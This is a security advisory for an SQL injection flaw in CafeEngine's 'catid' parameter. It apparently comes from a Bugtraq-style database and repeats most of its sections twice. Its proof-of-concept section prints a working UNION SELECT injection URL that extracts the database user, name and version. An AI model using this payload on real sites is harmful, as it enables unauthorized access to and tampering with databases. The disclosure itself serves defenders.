CafeEngine 'catid' Parameter SQL Injection Vulnerability
BID:33655
Info
CafeEngine 'catid' Parameter SQL Injection Vulnerability
| Bugtraq ID: | 33655 |
| Class: | Input Validation Error |
| CVE: | |
| Remote: | Yes |
| Local: | No |
| Published: | Feb 06 2009 12:00AM |
| Updated: | Feb 09 2009 10:58PM |
| Credit: | SuNHouSe2 |
| Vulnerable: |
CafeEngine CafeEngine 0 |
| Not Vulnerable: | |
Discussion
CafeEngine 'catid' Parameter SQL Injection Vulnerability
CafeEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
CafeEngine is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Exploit / POC
CafeEngine 'catid' Parameter SQL Injection Vulnerability
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
Attackers can use a browser to exploit this issue.
The following example URI is available:
http://www.example.com/index.php?catid=4%20UNION%20ALL%20SELECT%201,2,3,Group_concat(user(),0x3a,database(),0x3a,version()),5,6,7,8,9,10--
Solution / Fix
CafeEngine 'catid' Parameter SQL Injection Vulnerability
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
Solution:
Currently we are not aware of any vendor-supplied patches. If you feel we are in error or if you are aware of more recent information, please mail us at: [email protected].
References
CafeEngine 'catid' Parameter SQL Injection Vulnerability
References:
References:
- CafeEngine Homepage (CafeEngine)